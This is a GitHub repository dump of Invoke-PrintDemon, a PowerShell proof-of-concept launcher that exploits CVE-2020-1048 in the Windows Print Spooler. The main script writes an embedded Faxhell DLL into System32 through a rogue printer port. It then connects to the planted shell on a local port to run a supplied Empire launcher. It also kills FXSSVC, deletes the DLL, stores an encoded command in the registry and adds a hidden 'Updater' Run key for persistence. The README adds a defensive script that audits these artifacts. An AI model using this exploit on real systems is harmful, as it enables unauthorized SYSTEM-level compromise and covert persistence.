Repository: BC-SECURITY/Invoke-PrintDemon
Branch: master
Commit: 4e67182650ff
Files: 4
Total size: 26.0 KB

Directory structure:
gitextract_3zzsupzv/

├── .github/
│   └── FUNDING.yml
├── Invoke-PrintDemon.ps1
├── README.md
└── gitignore

================================================
FILE CONTENTS
================================================

================================================
FILE: .github/FUNDING.yml
================================================
# These are supported funding model platforms

github: [bc-security]


================================================
FILE: Invoke-PrintDemon.ps1
================================================
function Invoke-PrintDemon {
<#
    .SYNOPSIS

        This is an Empire launcher PoC using PrintDemon. CVE-2020-1048
        is a privilege escalation vulnerability that allows a persistent
        threat through the Windows Print Spooler. The vulnerability allows an
        unprivileged user to gain system-level privileges. Based on
        @ionescu007's PoC.

        Author: @hubbl3, @Cx01N
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None

    .EXAMPLE

        PS> Invoke-PrintDemon 'vAG4AUAB1CsAJABLACkAKQB8AEkARQBYAA=='

    .LINK

        https://github.com/ionescu007/PrintDemon
        https://stackoverflow.com/questions/4442122/send-raw-zpl-to-zebra-printer-via-usb
        https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1048
#>
param(
     [Parameter()]
     [string]$LauncherCode
 )
$LauncherCode = "kill (Get-Process FXSSVC).Id -force; Remove-Item -path  'C:\Windows\System32\ualapi.dll';" + [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($LauncherCode))
$LauncherCode =  [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($LauncherCode))

Add-PrinterDriver -Name "Generic / Text Only"
Add-PrinterPort -Name "C:\Windows\system32\ualapi.dll"
Add-Printer -Name "PrintDemon" -DriverName "Generic / Text Only" -PortName "C:\Windows\System32\Ualapi.dll"


$Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);

$MethodDefinition = @"
    using System;
    using System.IO;
    using System.Runtime.InteropServices;

    namespace Printer {

        public class RawPrinterHelper
        {
            // Structure and API declarations:
            [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
            public class DOCINFOA
            {
                [MarshalAs(UnmanagedType.LPStr)]
                public string pDocName;
                [MarshalAs(UnmanagedType.LPStr)]
                public string pOutputFile;
                [MarshalAs(UnmanagedType.LPStr)]
                public string pDataType;
            }
            [DllImport("winspool.Drv", EntryPoint = "OpenPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
            public static extern bool OpenPrinter([MarshalAs(UnmanagedType.LPStr)] string szPrinter, out IntPtr hPrinter, IntPtr pd);

            [DllImport("winspool.Drv", EntryPoint = "ClosePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
            public static extern bool ClosePrinter(IntPtr hPrinter);

            [DllImport("winspool.Drv", EntryPoint = "StartDocPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
            public static extern bool StartDocPrinter(IntPtr hPrinter, Int32 level, [In, MarshalAs(UnmanagedType.LPStruct)] DOCINFOA di);

            [DllImport("winspool.Drv", EntryPoint = "EndDocPrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
            public static extern bool EndDocPrinter(IntPtr hPrinter);

            [DllImport("winspool.Drv", EntryPoint = "StartPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
            public static extern bool StartPagePrinter(IntPtr hPrinter);

            [DllImport("winspool.Drv", EntryPoint = "EndPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
            public static extern bool EndPagePrinter(IntPtr hPrinter);

            [DllImport("winspool.Drv", EntryPoint = "WritePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
            public static extern bool WritePrinter(IntPtr hPrinter, IntPtr pBytes, Int32 dwCount, out Int32 dwWritten);

            // SendBytesToPrinter()
            // When the function is given a printer name and an unmanaged array
            // of bytes, the function sends those bytes to the print queue.
            // Returns true on success, false on failure.
            public static bool SendBytesToPrinter(string szPrinterName, IntPtr pBytes, Int32 dwCount)
            {
                Int32 dwError = 0, dwWritten = 0;
                IntPtr hPrinter = new IntPtr(0);
                DOCINFOA di = new DOCINFOA();
                bool bSuccess = false; // Assume failure unless you specifically succeed.

                di.pDocName = "My C#.NET RAW Document";
                di.pDataType = "RAW";

                // Open the printer.
                if (OpenPrinter(szPrinterName.Normalize(), out hPrinter, IntPtr.Zero))
                {
                    // Start a document.
                    if (StartDocPrinter(hPrinter, 1, di))
                    {
                        // Start a page.
                        if (StartPagePrinter(hPrinter))
                        {
                            // Write your bytes.
                            bSuccess = WritePrinter(hPrinter, pBytes, dwCount, out dwWritten);
                            EndPagePrinter(hPrinter);
                        }
                        EndDocPrinter(hPrinter);
                    }
                    ClosePrinter(hPrinter);
                }
                // If you did not succeed, GetLastError may give more information
                // about why not.
                if (bSuccess == false)
                {
                    dwError = Marshal.GetLastWin32Error();
                }
                return bSuccess;
            }

            public static bool SendFileToPrinter(string szPrinterName, string szFileName)
            {
                // Open the file.
                FileStream fs = new FileStream(szFileName, FileMode.Open);
                // Create a BinaryReader on the file.
                BinaryReader br = new BinaryReader(fs);
                // Dim an array of bytes big enough to hold the file's contents.
                Byte[] bytes = new Byte[fs.Length];
                bool bSuccess = false;
                // Your unmanaged pointer.
                IntPtr pUnmanagedBytes = new IntPtr(0);
                int nLength;

                nLength = Convert.ToInt32(fs.Length);
                // Read the contents of the file into the array.
                bytes = br.ReadBytes(nLength);
                // Allocate some unmanaged memory for those bytes.
                pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength);
                // Copy the managed byte array into the unmanaged array.
                Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength);
                // Send the unmanaged bytes to the printer.
                bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength);
                // Free the unmanaged memory that you allocated earlier.
                Marshal.FreeCoTaskMem(pUnmanagedBytes);
                return bSuccess;
            }
        }
    }
"@;
Add-Type -ReferencedAssemblies $Ref -TypeDefinition $MethodDefinition -Language CSharp;
$PE =  [System.Convert]::FromBase64String('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')

[IntPtr] $unmanaged = ([system.runtime.interopservices.marshal]::AllocHGlobal($pe.Length));
[system.runtime.interopservices.marshal]::Copy($PE, 0, $unmanaged, $PE.Length);
[Printer.RawPrinterHelper]::SendBytesToPrinter("PrintDemon", $unmanaged, $PE.Length);

$regcommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('sc.exe start Fax;$FTPServer = "localhost";$FTPPort = "9299";$tcpConnection = New-Object System.Net.Sockets.TcpClient($FTPServer, $FTPPort);$tcpStream = $tcpConnection.GetStream();$reader = New-Object System.IO.StreamReader($tcpStream);$writer = New-Object System.IO.StreamWriter($tcpStream);$writer.AutoFlush = $true;$commands = @( "DQA=",'''+ $LauncherCode + ''',"DQA=" );while ($tcpConnection.Connected){while ($tcpStream.DataAvailable){$reader.ReadLine()};if ($tcpConnection.Connected){For($i = 0; $i -lt 5; $i++){ForEach ($str in $commands){Start-Sleep -s 1;$command = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($str));$writer.WriteLine($command) | Out-Null;};};break;};};$reader.Close();$writer.Close();$tcpConnection.Close();'));
$RegPath = 'HKCU:Software\Microsoft\Windows\CurrentVersion\Debug';
$parts = $RegPath.split('\');$path = $RegPath.split("\")[0..($parts.count -2)] -join '\';
$name = $parts[-1];$null=Set-ItemProperty -Force -Path $path -Name $name -Value $regcommand;
$null=Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Updater -Value '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"';
}


================================================
FILE: README.md
================================================
# PrintDemon
This is a [PowerShell Empire](https://github.com/BC-SECURITY/Empire) launcher PoC using [PrintDemon](https://github.com/ionescu007/PrintDemon) and [Faxhell](https://github.com/ionescu007/faxhell). The module has the Faxhell DLL already embedded, which leverages [CVE-2020-1048](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1048) for privilege escalation. The vulnerability allows an unprivileged user to gain system-level privileges, and the module is based on @ionescu007's PoC.

![Invoke-Demon_Demo](https://user-images.githubusercontent.com/20302208/82018233-b6a83280-9639-11ea-8db0-28a82a5eb5d7.gif)

__Note__: This is a proof of concept. We have encountered some issues with printing to C:\Windows\System32\Ualapi.dll on some machines. We have not yet isolated what is causing this. You can drop the dll directly into System32 to test the launcher if you encounter issues.
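
For defenders, the artifacts this module leaves behind can be audited from PowerShell. The following is an added example, not code from this repository or from the upstream PoCs: it lists printer ports whose name is a file path (as with the `Ualapi.dll` port above) and checks the `HKCU` `Run` and `Debug` values the script writes. The function names are hypothetical and the regular expressions are heuristics; it assumes the built-in PrintManagement cmdlets `Get-Printer` and `Get-PrinterPort` are available.

```powershell
# Added defensive audit; not part of the Invoke-PrintDemon repository.
function Test-FilePathPortName {
    # True when a printer port name is a drive-letter file path such as C:\dir\file.dll
    param([Parameter(Mandatory)][string]$Name)
    $Name -match '^[A-Za-z]:\\.+\.[A-Za-z0-9]{1,5}$'
}

function Get-FilePathPrinterPort {
    # Ports whose "name" is a file: print jobs sent to them are written to that path.
    $printers = @(Get-Printer)
    Get-PrinterPort | Where-Object { Test-FilePathPortName $_.Name } | ForEach-Object {
        $name = $_.Name
        [pscustomobject]@{
            PortName        = $name
            Printers        = ($printers | Where-Object PortName -eq $name).Name -join ', '
            UnderSystemRoot = $name.StartsWith($env:SystemRoot, [StringComparison]::OrdinalIgnoreCase)
            FileExists      = Test-Path -LiteralPath $name
        }
    }
}

function Get-EncodedRunEntry {
    # HKCU Run values that start PowerShell with an encoded command or a hidden window.
    $key   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $skip  = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { return }
    $props.PSObject.Properties |
        Where-Object { $_.Name -notin $skip -and
                       "$($_.Value)" -match '(?i)powershell.*\s-(enc\w*|w\w*\s+hidden)\b' } |
        Select-Object Name, Value
}

function Get-DebugValue {
    # The script stores its encoded command in a value named Debug under CurrentVersion.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion'
    $p   = Get-ItemProperty -Path $key -Name Debug -ErrorAction SilentlyContinue
    if ($p) { [pscustomobject]@{ Key = $key; Name = 'Debug'; Length = "$($p.Debug)".Length } }
}

# Report findings for the current user; empty output means nothing matched.
Get-FilePathPrinterPort | Format-List
Get-EncodedRunEntry     | Format-List
Get-DebugValue          | Format-List
```

A file-path port is not malicious by itself (print-to-file setups use them), so treat `UnderSystemRoot = True` as the entry that needs an explanation.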

## Code Borrowed from
- https://github.com/ionescu007/PrintDemon
- https://github.com/ionescu007/faxhell
- https://stackoverflow.com/questions/4442122/send-raw-zpl-to-zebra-printer-via-usb
- https://stackoverflow.com/questions/29759854/how-to-connect-to-tcp-socket-with-powershell-to-send-and-receive-data


================================================
FILE: gitignore
================================================
venv/